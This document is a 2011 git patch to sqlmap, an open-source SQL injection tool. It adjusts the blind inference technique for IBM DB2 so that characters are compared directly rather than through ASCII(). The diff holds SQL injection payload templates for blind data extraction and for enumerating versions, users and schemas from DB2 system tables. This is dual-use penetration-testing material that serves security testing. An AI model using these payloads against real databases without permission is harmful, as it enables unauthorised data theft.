From 9eb683531dae0ceb888e7a3cb36ce80667dac1c6 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Mon, 27 Jun 2011 22:28:12 +0000
Subject: [PATCH] Minor improvement at blind SQL inj technique for DB2

---
 lib/techniques/blind/inference.py | 2 +-
 xml/queries.xml                   | 5 ++---
 2 files changed, 3 insertions(+), 4 deletions(-)

diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index cdd1196f3..07b568726 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -135,7 +135,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
         hintlock.release()
 
         if hintValue is not None and len(hintValue) >= idx:
-            if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB):
+            if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2):
                 posValue = hintValue[idx-1]
             else:
                 posValue = ord(hintValue[idx-1])
diff --git a/xml/queries.xml b/xml/queries.xml
index bd7c5772c..eaeb00438 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -564,8 +564,7 @@
         <timedelay query=""/>
         <substring query="SUBSTR((%s),%d,%d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSIBM.SYSDUMMY1"/>
-        <!-- TODO: ASCII() not supported in all versions -->
-        <inference query="ASCII(SUBSTR((%s),%d,1)) > %d"/>
+        <inference query="SUBSTR((%s),%d,1) > '%c'"/>
         <!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
         <banner query="SELECT service_level FROM TABLE (sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT, versionnumber FROM sysibm.sysversions) AS foobar WHERE LIMIT=1"/>
         <current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
@@ -602,7 +601,7 @@
         </dump_table>
         <search_db>
             <inband query="SELECT schemaname FROM syscat.schemata WHERE " query2="" condition="schemaname" condition2=""/>
-            <blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE " query2="" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE " count2="" condition="schemaname" condition2=""/>        
+            <blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE " query2="" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE " count2="" condition="schemaname" condition2=""/>
         </search_db>
         <search_table>
             <inband query="SELECT tabschema, tabname FROM sysstat.tables WHERE " condition="tabname" condition2="tabschema"/>